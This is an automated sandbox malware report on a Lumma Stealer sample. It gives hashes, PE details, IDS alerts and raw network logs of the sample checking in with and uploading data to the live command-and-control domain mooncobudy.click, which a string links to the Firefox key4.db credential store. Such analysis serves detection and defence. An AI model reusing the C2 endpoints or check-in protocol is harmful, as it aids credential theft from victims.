                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700003.1&ctaBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://mooncobudy.click:443/apiMBitLockerToGo.exe, 00000003.00000003.1766109037.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4ClZfC2k4pbW4ZbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://mooncobudy.click/BitLockerToGo.exe, 00000003.00000003.1766085473.0000000003337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://mooncobudy.click:443/apiv1np.default-release/key4.dbPKBitLockerToGo.exe, 00000003.00000003.1766109037.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                                              https://mooncobudy.click/4%G##BitLockerToGo.exe, 00000003.00000003.1746691528.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1741691153.0000000003329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
IP:188.114.97.3
Domain:mooncobudy.click
Country:European Union
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:true
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1585289
                                                                              Start date and time:2025-01-07 13:18:09 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 4m 17s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:64pOGv7k4N.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:a56fc11692ab8baf7f9e3b80540d63c5.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 50%
                                                                              HCA Information:
                                                                              • Successful, ratio: 91%
                                                                              • Number of executed functions: 24
                                                                              • Number of non-executed functions: 98
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Stop behavior analysis, all processes terminated
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 64pOGv7k4N.exe, PID 7612 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time:07:19:36
Type:API Interceptor
Description:8x Sleep call for process: BitLockerToGo.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match:mooncobudy.click
• Set-up.exe, Detection: malicious, Threat Name: LummaC, GO Backdoor, LummaC Stealer, Context: 188.114.97.3
• Setup_W.exe, Detection: malicious, Threat Name: LummaC, Context: 104.21.44.57
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Entropy (8bit):6.371437153316211
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:64pOGv7k4N.exe
                                                                              File size:3'805'184 bytes
                                                                              MD5:a56fc11692ab8baf7f9e3b80540d63c5
                                                                              SHA1:4ddd8e40b3ca6c4cd0cf4156b5b163074065a79c
                                                                              SHA256:0bcd82ed4ea3e12cbaabc50df612d48078604e4d0985e9a240afc24630afa4d7
                                                                              SHA512:48dad306d5ea8beef592aed1c058028c9e381094ac744e4a83ef417fb3818957892a0e10cee9a9111bfd143bb2a2d8089702307408b61c61cc89d15080a22065
                                                                              SSDEEP:49152:bJ1e+9v2D0/fUjjodrWaQPF7IfxzcewtrzzOlEVp531fv7E6r61nF16FbG:bJ15LU/Qr0rz9fv
                                                                              TLSH:A8063941FADB80B5DA0318302457A2BF57307E095B34CB97FA1C7E5AEB736A20D36619
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........9..............J..........`.........7...@..........................@=......u:...@................................
                                                                              Icon Hash:92a9ececd2d2ad92
                                                                              Entrypoint:0x45de60
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:1
                                                                              File Version Major:6
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3bc000 | 0x3dc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3d1000 | 0x2387 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3bd000 | 0x12e3c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3712e0 | 0xa0 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b4975 | 0x1b4a00 | 4b98a93914635cce4faf0bb661387b30 | False | 0.40134621922416264 | data | 6.03531144567553 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1b6000 | 0x1ba4a8 | 0x1ba600 | 6de9448ebe2ae5e8c580170a750962e0 | False | 0.4998465756569652 | data | 6.074871419086468 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x371000 | 0x4a238 | 0x1c200 | fd8dfcd020de054704e372e76ef7deac | False | 0.5106944444444445 | data | 5.605165413136394 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x3bc000 | 0x3dc | 0x400 | 9b972faccfd001450012473f76e2e70e | False | 0.4892578125 | data | 4.665334753873026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x3bd000 | 0x12e3c | 0x13000 | 682dd942cd1a363c189cad4e930c40c3 | False | 0.6317459909539473 | data | 6.654383754884241 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x3d0000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x3d1000 | 0x2387 | 0x2400 | f72006c414cf8622632c6b8157db1f7a | False | 0.8364800347222222 | data | 7.514554072460553 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3d1130 | 0x1b97 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9350134503751947
RT_GROUP_ICON | 0x3d2cc8 | 0x14 | data | English | United States | 1.05
RT_VERSION | 0x3d2cdc | 0x288 | data | English | United States | 0.4799382716049383
RT_MANIFEST | 0x3d2f64 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-07T13:19:35.249464+0100 | 2058715 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mooncobudy .click) | 1 | 192.168.2.3 | 53184 | 1.1.1.1 | 53 | UDP
2025-01-07T13:19:35.825750+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49913 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:35.825750+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49913 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:36.324777+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.3 | 49913 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:36.324777+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.3 | 49913 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:37.138527+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49919 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:37.138527+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49919 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:37.895782+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.3 | 49919 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:37.895782+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.3 | 49919 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:38.728022+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49930 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:38.728022+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49930 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:40.827989+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49944 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:40.827989+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49944 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:41.479046+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.3 | 49944 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:42.154407+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49951 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:42.154407+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49951 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:43.789033+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49963 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:43.789033+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49963 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:45.302126+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49973 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:45.302126+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49973 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:45.306719+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.3 | 49973 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:47.239277+0100 | 2058716 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) | 1 | 192.168.2.3 | 49983 | 188.114.97.3 | 443 | TCP
2025-01-07T13:19:47.239277+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49983 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Jan 7, 2025 13:19:45.306405067 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306444883 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.306516886 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306559086 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306600094 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.306740999 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306771994 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.306902885 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306941986 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.307079077 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.307105064 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.316452026 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.316803932 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.316837072 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.316859007 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.316894054 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.317001104 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.317039013 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.317059040 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.320377111 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.320586920 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.320628881 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.320652962 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.320677042 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.322113991 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.950628996 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.950726986 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.950823069 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.950922966 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.950947046 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.973050117 CET49983443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.973084927 CET44349983188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.973207951 CET49983443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.973715067 CET49983443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.973726988 CET44349983188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:47.239276886 CET49983443192.168.2.3188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 13:19:35.249464035 CET | 53184 | 53 | 192.168.2.3 | 1.1.1.1
Jan 7, 2025 13:19:35.260907888 CET | 53 | 53184 | 1.1.1.1 | 192.168.2.3

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 13:19:35.249464035 CET | 192.168.2.3 | 1.1.1.1 | 0xa9fc | Standard query (0) | mooncobudy.click | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 13:19:01.720429897 CET | 1.1.1.1 | 192.168.2.3 | 0xc28b | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:01.720429897 CET | 1.1.1.1 | 192.168.2.3 | 0xc28b | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:35.260907888 CET | 1.1.1.1 | 192.168.2.3 | 0xa9fc | No error (0) | mooncobudy.click | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:35.260907888 CET | 1.1.1.1 | 192.168.2.3 | 0xa9fc | No error (0) | mooncobudy.click | | 188.114.96.3 | A (IP address) | IN (0x0001) | false

                                                                              • mooncobudy.click

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.3 | 49913 | 188.114.97.3 | 443 | 7912 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:35 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: mooncobudy.click
2025-01-07 12:19:35 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-07 12:19:36 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2vuebsattpctvm6bo71m4q91d0; expires=Sat, 03 May 2025 06:06:15 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mf0srxLIppZFmCYzrxIj4bslnSJkHeqXsoxsM36bY%2FclGU5aNIm6ppFs78WOoI3bFdDrQosOj%2B5rK2%2BZINqrh0P%2BLgSTV14M1pe1OnmRf4rIq4cqlDvYGLgHFKamhBBKvj5A"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5a5ef7a19a1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1940&rtt_var=740&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1466599&cwnd=118&unsent_bytes=0&cid=2da5f7e01512df40&ts=572&x=0"
2025-01-07 12:19:36 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-07 12:19:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.3 | 49919 | 188.114.97.3 | 443 | 7912 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:37 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 48
                                                                              Host: mooncobudy.click
2025-01-07 12:19:37 UTC | 48 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=Jwquln--3112YT&j=
2025-01-07 12:19:37 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bn2v9a1maljn6sm375gqv2rv2m; expires=Sat, 03 May 2025 06:06:16 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0rVQkhLLp%2FQ1IM4vp9bQQh2Hnl7oJBfPrTEyYorcrukdI48%2BxCKKMQ%2FlwrkJLsCudshUGPTmsuPonJ2rOy4aNv2SA350AIyJY0fRITaUGN7n8nqYl8L7HGKbdrd1zNkbxKC"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5ad9ad30f84-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1471&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=948&delivery_rate=1872995&cwnd=244&unsent_bytes=0&cid=5a5907987e4f4852&ts=764&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.3 | 49930 | 188.114.97.3 | 443 | 7912 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:19:38 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=1Y62FI810ZF7YOA
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12845
                                                                              Host: mooncobudy.click
